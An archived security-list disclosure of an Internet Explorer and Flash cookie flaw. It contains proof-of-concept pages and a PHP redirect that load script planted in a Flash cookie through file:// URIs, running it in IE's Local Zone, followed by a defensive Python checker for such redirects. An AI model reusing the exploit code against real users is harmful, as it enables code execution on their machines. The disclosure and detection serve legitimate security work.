

TUCoPS :: Browsers :: bt1618.txt

Internet Explorer Vulnerability: Content-Location works with both triple and double slash
After I reported the Content-Location vulnerability (http://www.securityfocus.com/archive/1/342317),
Thor Larholm explained that the HTML execution was not caused by the Content-Location header, but instead
by the triple slash (file:///).
I have tested it with a double slash, and I even tested the triple slash without the Content-Location header,
but neither worked.
The difference between the triple slash and the double slash is that with the triple slash htm.html loads the cookie in the iframe,
while with the double slash the whole page tries to load the cookie, which then requires the user
to press Back and refresh the page.

I have created 2 proof-of-concepts which show how both vulnerabilities cannot be exploited separately.

1. http://mlsecurity.com/ie/wee.php

This page will create a flash cookie and when you press continue it will load htm.html which contains an iframe. 
This iframe will load red.php which contains the Content-Location header pointing at the flash cookie. 
The flash cookie location will only have a double slash (file://).

wee.php  - Loads a flash movie which creates a cookie in 
C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol


htm.html
******************************
<html>
<script type="text/javascript" src="querystring.js"></script>
<script>
<!-- The escaped string below decodes to:
     <iframe name="wee2" src="red.php?a=USER&drive=DRIVE"></iframe>
     where USER and DRIVE are taken from the query string by querystring.js -->
document.write(unescape("%3Ciframe%20name%3D%22wee2%22%20src%3D%22red.php%3Fa%3D" + QueryString['a'] + "%26drive%3D" + QueryString['drive'] + "%22%3E%3C/iframe%3E"));

</script>
<br><p>
Sometimes the iframe doesn't load properly. If the iframe shows a white blank page then press refresh.
<p>
You will know when the exploit worked when the iframe shows weird stuff like my_Array0Sven1kelor2.
<p>

The script assumes you are under windows 2000/XP logged on as administrator.<br>


If you are not logged on as administrator type the username you're logged in under in the box below and press Go Go Go.<p>

<form method="GET">
Logged on to windows as user: <input type=text name="a" value="administrator"><br>
Windows is installed on drive: <input type=text name="drive" value="C"><br>
<input type=submit value="Go Go Go">
</form>

<p>

This should create a file called mlsecurity.txt in your c:\ drive.

<p>

<a href="exp.php">How it works?</a>

</html>
******************************

red.php
******************************
<?php
// Username and drive come from the query string. htm.html passes the JavaScript
// literal "undefined" when a field was not supplied, so treat that as unset.
$a = $_GET["a"];
if(!$a || $a=="undefined")
{
	$a="administrator";
}
if($_GET["drive"] && !strstr($_GET["drive"],"unde"))
{
	$d=$_GET["drive"];
}else
{
	$d="C";
}
// Redirect the iframe to the Flash cookie (.sol) with a double-slash file:// URI
header("Location: file://".$d.":/Documents and Settings/".$a."/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol");
?>

******************************
2. http://mlsecurity.com/ie/ie.php

This proof-of-concept only uses the triple slash method to open the cookie in an iframe.

ie.php - Loads a flash movie which creates a cookie in C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol

htm2.html
******************************
<html>


	<iframe src="file:///C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol"></iframe>

 <p>
Note: you might need to edit the html to fit your system.  
<p>

Macromedia Flash Player is reported to store Flash cookies (.sol files) in a predictable location on client systems.  
Other attacks are possible given the ability to store content on a system in a predictable location, such as 
referencing the content via a file:// URI.  This is compounded by the fact that an attacker could include HTML 
and script code in the cookie, which may be interpreted by Internet Explorer or possibly other browsers.  
In the example of Internet Explorer, such content would be interpreted in the context of the Local Zone.  
Successful exploitation would still require the attacker to guess the local username of the victim.
<br>
<br>This issue is reported to affect versions of the player for Microsoft Windows operating systems.  
Other versions may also be affected.  Macromedia Director MX is similarly affected.
<br>
<br>This issue was originally covered by Securityfocus.com BID 8886 but has been determined to be a distinct 
issue in Macromedia Flash. Securityfocus.com BID 8886 was also updated with additional technical details 
describing a new issue in Internet Explorer.  The original report for these issues was a proof-of-concept
 provided by Mindwarper which exploited both of the issues simultaneously.
<p>


- Discovered by Mindwarper<br>
</html>
I have tested these pages on both win2k sp4 ie6 fully patched and on winXP. 
I even tried using a few IE hacks and it still worked.

-----------------------------|
- Mindwarper                 |
- mindwarper@linuxmail.org   |
- http://mlsecurity.com      |
-----------------------------|
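Added editor's example, not part of Mindwarper's post: the defensive counterpart of what the post describes is a response-header check, of the kind a filtering proxy or a log reviewer could run, that flags any Location, Content-Location or Refresh header steering the browser to a local file: URI, whether written with two slashes, three slashes or backslashes. The header blocks below are constructed samples, not captured traffic, and the function names are this example's own.

```python
import re
from typing import List, Tuple

# Response headers a browser may follow to a new location.
REDIRECT_HEADERS = ("location", "content-location", "refresh")

# file: scheme with any number of slashes or backslashes after it, case-insensitive.
# Leading whitespace is tolerated because header values are.
_FILE_SCHEME = re.compile(r"^\s*file\s*:", re.IGNORECASE)
# Refresh header form: "N; url=<target>" with optional quotes around the target.
_REFRESH_URL = re.compile(r"url\s*=\s*['\"]?([^'\"]*)", re.IGNORECASE)


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Split a raw HTTP response header block into (name, value) pairs.

    The status line is skipped, names are lower-cased, and obsolete line
    folding (continuation lines starting with SP or HTAB) is unfolded.
    """
    lines = raw.replace("\r\n", "\n").split("\n")
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:                 # lines[0] is the status line
        if not line.strip():
            break                          # blank line ends the header block
        if line[0] in " \t" and headers:   # folded continuation of previous header
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return headers


def redirect_target(name: str, value: str) -> str:
    """Extract the URI a redirect-type header points the client at."""
    if name == "refresh":
        m = _REFRESH_URL.search(value)
        return m.group(1).strip() if m else ""
    return value


def is_local_file_uri(uri: str) -> bool:
    """True if following the URI would make the browser open a local file."""
    return bool(_FILE_SCHEME.match(uri))


def find_local_file_redirects(raw: str) -> List[Tuple[str, str]]:
    """Return (header, target) pairs in a response that redirect to file: URIs."""
    hits: List[Tuple[str, str]] = []
    for name, value in parse_headers(raw):
        if name in REDIRECT_HEADERS:
            target = redirect_target(name, value)
            if is_local_file_uri(target):
                hits.append((name, target))
    return hits


# Constructed sample responses (not captured traffic).
SUSPICIOUS = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache\r\n"
    "Location: file://C:/Documents and Settings/user/Application Data/x.sol\r\n"
    "Content-Location: FILE:///C:/Documents and Settings/user/Application Data/x.sol\r\n"
    "Refresh: 0; url=file:///C:/example.txt\r\n"
    "\r\n"
)
BENIGN = (
    "HTTP/1.1 302 Found\r\n"
    "Location: https://example.com/login\r\n"
    "Content-Location: /index.html\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, resp in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, find_local_file_redirects(resp))
```

The check matches on the scheme rather than on a specific slash count, which is the point the post makes: a server-supplied file: target is suspicious in a web response regardless of whether it is written as file:// or file:///.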
